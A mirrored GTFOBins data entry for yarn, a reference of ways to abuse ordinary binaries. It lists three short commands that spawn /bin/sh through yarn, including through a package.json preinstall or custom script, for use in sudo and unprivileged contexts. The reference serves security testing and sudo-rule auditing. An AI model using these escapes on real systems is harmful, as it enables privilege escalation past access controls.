1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/yarn
2026-01-13 18:58:28 +01:00

22 lines
396 B
Plaintext

---
functions:
shell:
- code: |-
yarn exec /bin/sh
contexts:
sudo:
unprivileged:
- code: |-
echo '{"scripts": {"preinstall": "/bin/sh"}}' >package.json
yarn --cwd .
contexts:
sudo:
unprivileged:
- code: |-
echo '{"scripts": {"xxx": "/bin/sh"}}' >package.json
yarn --cwd . xxx
contexts:
sudo:
unprivileged:
...